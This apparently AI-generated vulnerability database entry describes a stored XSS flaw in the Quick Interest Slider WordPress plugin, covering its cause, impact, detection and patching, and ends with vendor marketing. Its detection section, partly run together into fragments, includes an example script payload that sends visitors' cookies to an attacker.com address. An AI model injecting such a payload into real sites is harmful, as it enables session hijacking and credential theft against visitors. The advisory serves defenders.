
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-5694 is a Stored Cross-Site Scripting (XSS) vulnerability in the Quick Interest Slider plugin for WordPress, affecting all versions up to and including 3.1.5. The flaw exists in the loan-amount and loan-period parameters due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject persistent malicious scripts into pages. It was published on April 15, 2026, with a patch identified as of April 22, 2026. The vulnerability carries a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), where user-supplied values in the loan-amount and loan-period parameters are neither sanitized on input nor properly escaped on output before being rendered in page content. Because the plugin fails to validate or encode these parameters, an unauthenticated attacker can submit crafted HTTP requests containing arbitrary JavaScript payloads that are stored server-side and subsequently executed in any visitor's browser. The vulnerable code paths are visible in the plugin source at lines 1335 and 1338 of quick-interest-slider.php version 3.1.5 (GitHub Advisory, Wordfence).
Successful exploitation allows unauthenticated attackers to persistently inject arbitrary JavaScript into WordPress pages, which executes in the browsers of all subsequent visitors without any further attacker interaction. This can lead to session hijacking, credential theft, malware distribution to site visitors, or defacement of website content. The scope is marked as "Changed" in the CVSS vector, indicating that the impact extends beyond the vulnerable plugin itself to affect end users of the WordPress site (GitHub Advisory, Wordfence).
There is no public proof-of-concept exploit code and no evidence of active in-the-wild exploitation at this time. The vulnerability requires no authentication and no user interaction to inject the payload, making it trivially exploitable by any network-accessible attacker against sites running the affected plugin versions. The EPSS score is approximately 0.061% (0.000610), indicating a low current probability of exploitation within the next 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog (GitHub Advisory, Wordfence).
loan-amount and loan-period input parameters are present in the page or form submission.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>, to be injected via the vulnerable parameters.loan-amount or loan-period parameter. No authentication is required.loan-amount or loan-period parameters; outbound requests from visitor browsers to unknown external domains (potential exfiltration endpoints).<script>, javascript:, or URL-encoded equivalents (%3Cscript%3E) in loan-amount or loan-period query/body parameters.wp_posts, wp_options, or plugin-specific tables) containing unexpected <script> tags or JavaScript URIs in fields associated with the Quick Interest Slider plugin.Site administrators should immediately upgrade the Quick Interest Slider plugin to a version newer than 3.1.5, as a patch was made available on April 22, 2026. If immediate patching is not possible, implement Web Application Firewall (WAF) rules to filter and block malicious input targeting the loan-amount and loan-period parameters. After patching, conduct a security audit of the WordPress database to identify and remove any previously injected malicious scripts. Monitor pages using the plugin for unauthorized modifications or suspicious content (GitHub Advisory, Wordfence).
Wordfence, which discovered and reported the vulnerability, included it in their weekly WordPress vulnerability report for April 13–19, 2026, and published threat intelligence details on their platform. RedPacket Security flagged the CVE via social media (Mastodon) and their blog shortly after disclosure. Community coverage has been limited to automated CVE alert aggregators and security feeds, with no notable independent researcher commentary or broader media coverage identified (Wordfence Blog, RedPacket Security).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."